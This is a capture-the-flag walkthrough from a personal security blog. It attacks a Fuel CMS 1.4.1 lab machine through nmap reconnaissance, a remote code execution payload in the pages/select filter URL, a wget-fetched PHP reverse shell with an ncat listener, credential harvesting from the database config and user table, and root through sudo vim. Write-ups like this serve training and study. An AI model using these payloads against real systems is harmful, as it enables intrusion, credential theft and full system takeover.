Muzec's Cyber Security Blog

Hack. Sleep. Repeat

View on GitHub

image

We always start with an nmap scan…..

Nmap -sC -sV -oA nmap <Target-IP>

Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-09 12:33 EDT
Nmap scan report for 10.10.176.69
Host is up (0.19s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 1c:59:d1:07:ea:d8:d2:0d:9a:1a:95:0c:74:f2:e6:d0 (RSA)
|   256 cd:a8:fc:b3:5c:0e:3e:12:76:80:d3:60:cb:1f:88:50 (ECDSA)
|_  256 91:57:e4:6e:1d:4e:48:ec:3a:1c:a3:c7:89:40:4b:64 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Fuel CTF
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 55.27 seconds

Shit here we go again lol so we have 2 open ports SSH(22) and HTTP(80) ok aheading to port 80 to see what is running.

image

image

Fuelcms cool and we have the version also 1.4.1 ok let look around the blog more so i found a credentials aslo but no luck with it.

image

Since we know the Fuelcms version let check if it vulnerable.

image

Ahhhh yea some Remote Code Execution exploit look cool let give it a try i love doing things manually why is that?? because we learn more from doing things manually that is the best way to learn.

image

Going through the exploit i found our the vulnerable page which can allow us to run system command with some little tweaking added.

http://10.10.176.69/fuelcms/index.php/fuel/pages/select/?filter='%2Bpi(print(%24a%3D'system'))%2B%24a('uname -a')%2B'

image

Cool our commands works now time to get a reverse shell back to our terminal.

  1. we need to host the reverse shell with SimpleHTTPServer on our attacking machine
  2. we need to use wget to get it onto the victim machine

image

Now let wget it.

http://10.10.176.69/fuelcms/index.php//fuel/pages/select/?filter='%2Bpi(print(%24a%3D'system'))%2B%24a('wget local-ip:8000/rev.php')%2B'

image

Now let start our ncat listener with the port we add to the reverse shell file.

image

Now let access the reverse shell file to get our shell back we can also confirm our file if upload on the target.

http://10.10.176.69/fuelcms/index.php//fuel/pages/select/?filter='%2Bpi(print(%24a%3D'system'))%2B%24a('ls -la')%2B'

image

Now let get Shell.

http://10.10.176.69/fuelcms/rev.php

image

Boom we have shell and also let spawn a TTY shell.

python3 -c 'import pty; pty.spawn ("/bin/bash")'

Privilege Escalation

Going to the directory we have only one user both have no access to it.

image

Going through the FuelCMS folder i found the database with MYSQL login details.

/var/www/html/fuelcms/fuel/application/config/database.php

image

Typing mysql and i was in .

image

show databases;
use fuelcmsdb;
show tables;

image

Now let read fuel_users table.

SELECT * From fuel_users;

image

Boom we have john password in base64 now let decode it.

image

Decoded since we have the password now i think we have port 22 open which is SSH let log in with it.

image

And we are in now let check sudo.

image

Seems we can run vim ti get root let check gtfobins.

image

sudo vim -c ':!/bin/sh'

image

And we are root.

Greeting From Muzec



Back To Home